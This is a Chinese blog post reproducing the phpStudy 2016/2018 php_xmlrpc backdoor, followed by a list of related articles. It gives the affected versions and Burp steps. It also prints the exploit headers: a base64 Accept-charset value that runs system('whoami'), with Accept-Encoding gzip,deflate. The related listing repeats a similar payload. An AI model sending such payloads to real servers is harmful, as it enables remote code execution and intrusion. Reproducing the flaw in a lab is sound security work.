phpstudy后门漏洞复现

最新推荐文章于 2023-10-16 16:54:14 发布
最新推荐文章于 2023-10-16 16:54:14 发布
阅读量190 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46490129/article/details/111573938
版权

phpstudy后门漏洞复现##

漏洞危害
高危

漏洞描述
攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门

影响版本
phpstudy 2016版 php-5.4
phpstudy 2018版 php-5.2.17
phpstudy 2018版 php-5.4.45

工具准备

phpsudy2016 -phpstudy2018

brup

漏洞复现
访问phpinfo页面


使用brup 抓住当前页面包

放入 Repeater模块中

利用代码
Accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate

在这里插入图片描述

复现注意
第一注意版本问题,在官网已经 没有存在后门的phpstudy

在这里插入图片描述

Accept-charset: c3lzdGVtKCd3aG9hbWknKTs= 这一行 代码 就是 base64 编码过后执行的 代码
如需要转载 请标明

L_{ROOT}
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PhpStudy后门漏洞实战复现
la-大白
10-28 4814
phpstudy后门漏洞
phpStudy后门漏洞复现
LuckySec
08-20 5679
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
漏洞复现】之PhpStudy后门”利用复现、修复及使用脚本快速复现(最全,转自https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html)
qq_45290991的博客
10-07 1138
漏洞复现】之PhpStudy后门”利用复现、修复及使用脚本快速复现 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)   该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!    一、事件背景   北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后...
phpstudy后门复现
hackerie的博客
10-29 425
1.影响版本分布: phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl...
phpstudy_2016-2018_rce_backdoor后门漏洞复现
最新发布
qq_58683895的博客
10-16 287
攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门
phpStudy 后门版.rar
09-24
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发...
PhpStudy后门供应链攻击文档
09-23
PhpStudy后门供应链攻击文档】详细解析 PhpStudy是一款在国内广泛使用的PHP开发与调试环境,因其集成多种软件如Apache、PHP、MySQL等而受到PHP初学者和开发者的青睐。然而,2019年9月,杭州公安揭露了一起重大...
phpstudy后门.py
10-07
能够在phpstudyphpStudy20161103版本:php5.4.45与php5.2.17 phpStudy20180211版本:php5.4.45与php5.2.17
phpstudy后门版).7z
06-03
phpstudy后门版,可用于后门测试
phpstudy后门rce批量利用脚本的实现
10-15
PHPStudy后门RCE是指通过其存在的安全漏洞,攻击者可以发送特定的HTTP请求,使得服务器执行攻击者指定的命令。这通常是由于配置不当或未打补丁的漏洞导致的。一旦被利用,攻击者可以控制服务器执行任意操作,包括...
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3571
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
phpstudy后门
一个普普通通的博客
04-17 1500
phpstudy后门 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样一款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据 回传大量敏感信 二、后门
phpstudy_2016-2018_rce 漏洞复现及深度利用
m0_67189356的博客
04-16 5128
说明 内容 漏洞编号 phpstudy_2016-2018_rce 漏洞名称 RCE(Remote Command|Code Execute) 漏洞评级 高危 影响范围 phpStudy 2016 phpStudy 2018 漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code E
Phpstudy隐藏后门
热门推荐
Sylon的博客
09-24 3万+
Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户 9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯...
phpstudy真的有后门吗?是的!附后门查询及解决办法
小刚刚技术博客
09-26 2996
网上看到phpstudy后门,简单探索复现了下,果然,不知不觉已经沦为肉鸡中的一员.... 目前测试发现phpStudy2016和phpStudy2018版本存在后门. 简单记录下过程: 环境配置 phpstudy 2018 php 5.4.45 配置文件php.ini extensio...
phpstudy后门预警及漏洞复现
ranuy阮的博客
09-24 1万+
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量...
自查phpstudy后门以及漏洞复现
潜心学安全的小白
10-08 1796
phpstudy事件描述自查后门漏洞复现环境准备漏洞利用修复建议 事件描述 杭州公安在9月20日发布的杭州警方通报打击涉网违法犯罪暨“净网行动2019”专项行动战果中提到,2016年发布的phpstudy版本被不法分子恶意植入后门,犯罪嫌疑人在2019年初被公安机关抓获。其利用植入的后门非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组。受影响的用户还是比较多的。 ...
phpstudy php_xmlrpc.dll后门漏洞复现
https://www.cnblogs.com/zpchcbd/
09-26 7163
搭建环境: phpstudy2018 php版本5.4 漏洞影响版本:5.2/5.4 漏洞利用 1、随便访问一个存在的php文件 我这里就访问index.php好了 2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令 Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw== Accept-Encoding: gzip,def...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值